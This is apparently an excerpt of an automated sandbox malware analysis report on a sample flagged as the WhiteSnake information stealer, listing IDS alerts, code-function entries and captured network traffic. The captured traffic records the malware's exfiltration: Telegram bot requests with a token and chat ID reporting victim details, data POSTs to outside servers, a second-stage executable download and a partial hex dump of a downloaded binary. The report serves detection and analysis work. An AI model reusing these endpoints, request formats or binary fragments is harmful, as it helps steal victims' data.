                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax7_2_00007FF848F165B0
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1E8B0h7_2_00007FF848F1E0C4
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1DAA9h7_2_00007FF848F1BB98
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax7_2_00007FF848F216DF
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1DAA9h7_2_00007FF848F1D59F
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F2055Dh7_2_00007FF848F20459
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h7_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h7_2_00007FF848F148F3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1E577h7_2_00007FF848F1E37C
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1DA99h13_2_00007FF848F1BAE2
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F2C369h13_2_00007FF848F2C135
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h13_2_00007FF848F14141
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax13_2_00007FF848F1615E
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1DA99h13_2_00007FF848F1B9ED
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F2E654h13_2_00007FF848F2E49A
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1D20Fh13_2_00007FF848F1CC9E
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1D406h13_2_00007FF848F1CC9E
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F2210Dh13_2_00007FF848F21E8E
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1E567h13_2_00007FF848F1DD70
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1E8A0h13_2_00007FF848F1DD70
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F21648h13_2_00007FF848F210BE
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax13_2_00007FF848F14F54
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F237F1h13_2_00007FF848F232C9
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F1DA99h13_2_00007FF848F1D58F
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F17A3Ch13_2_00007FF848F17839
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h13_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax13_2_00007FF848F1FFBF
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax40_2_00007FF848F26DD0
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F27A3Ch40_2_00007FF848F27858
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F24908h40_2_00007FF848F24894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F24934h40_2_00007FF848F248F3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F27A3Ch40_2_00007FF848F25792
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax40_2_00007FF848F29BF6
                      Source: C:\Users\user\AppData\Roaming\manager.exeCode function: 4x nop then jmp 023B185Ah41_2_023B0B88
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 4x nop then jmp 0322185Ah42_2_03220B88
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 4x nop then jmp 0322185Ah42_2_03220B78
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeCode function: 4x nop then jmp 00ED185Ah45_2_00ED0B88
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F34934h46_2_00007FF848F34141
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax46_2_00007FF848F34F54
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F34908h46_2_00007FF848F34894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F166FB
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h47_2_00007FF848F14141
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F14F54
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h47_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F19D36
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F17B7Ch47_2_00007FF848F17979
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax48_2_00007FF848F16F09
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h48_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h48_2_00007FF848F148F3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax48_2_00007FF848F19D36
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F17B7Ch48_2_00007FF848F17979

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49711 -> 185.253.7.60:8080
                      Source: Network trafficSuricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: Network trafficSuricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49711 -> 185.253.7.60:8080
                      Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49738 -> 45.82.65.63:80
                      Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49739 -> 188.120.242.78:8817
                      Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49729 -> 167.99.138.249:8080
                      Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49737 -> 206.189.109.146:80
                      Source: Network trafficSuricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: Network trafficSuricata IDS: 2045869 - Severity 1 - ET MALWARE WhiteSnake Stealer Telegram Checkin : 192.168.2.5:49740 -> 149.154.167.220:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 193.149.187.135
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8817 -> 49739
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0LpFv1haTA.exe, type: SAMPLE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49729 -> 167.99.138.249:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49739 -> 188.120.242.78:8817
                      Source: global trafficTCP traffic: 192.168.2.5:49744 -> 193.149.187.135:4444
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 21:28:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Sep 2024 18:44:49 GMTETag: "cc00-622b9aabbea40"Accept-Ranges: bytesContent-Length: 52224Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 98 e7 d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c2 00 00 00 08 00 00 00 00 00 00 de e1 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e1 00 00 57 00 00 00 00 00 01 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 c1 00 00 00 20 00 00 00 c2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 00 01 00 00 06 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 e1 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 7a 00 00 f4 66 00 00 03 00 02 00 70 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 6f 6f 6d 38 32 35 00 03 ac 67 42 16 f3 e1 5c 76 1e e1 a5 e2 55 f0 67 95 36 23 c8 b3 88 b4 45 9e 13 f9 78 d7 c8 46 f4 22 02 28 17 00 00 0a 00 2a da 02 73 18 00 00 0a 7d 03 00 00 04 02 72 01 00 00 70 7d 04 00 00 04 02 28 17 00 00 0a 00 00 28 19 00 00 0a 14 fe 06 0b 00 00 06 73 1a 00 00 0a 6f 1b 00 00 0a 00 2a 06 2a 5e 02 28 17 00 00 0a 00 00 02 04 7d 1b 00 00 04 02 03 7d 1a 00 00 04 2a 0a 00 2a de 02 73 6c 00 00 0a 7d 6f 00 00 04 02 15 7d 72 00 00 04 02 15 7d 73 00 00 04 02 15 7d 74 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d 70 00 00 04 02 04 7d 6e 00 00 04 2a 3e 00 02 7b 6f 00 00 04 03 6f 6d 00 00 0a 00 2a 3e 00 02 7b 70 00 00 04 03 6f 5a 00 00 06 00 2a 3a 00 02 7b 70 00 00 04 6f 5b 00 00 06 00 2a 5a 02 16 7d ab 00 00 04 02 17 7d ad 00 00 04 02 28 17 00 00 0a 00 2a ae 02 16 7d b0 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d ae 00 00 04 02 7b ae 00 00 04 17 6f 98 00 00 0a 00 02 04 7d af 00 00 04 2a 5
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 135595Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 140694Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /manager.exe HTTP/1.1Host: 185.80.128.17Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /manager.exe HTTP/1.1Host: 185.80.128.17Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: serveo.net
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 135595Expect: 100-continueConnection: Keep-Alive
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
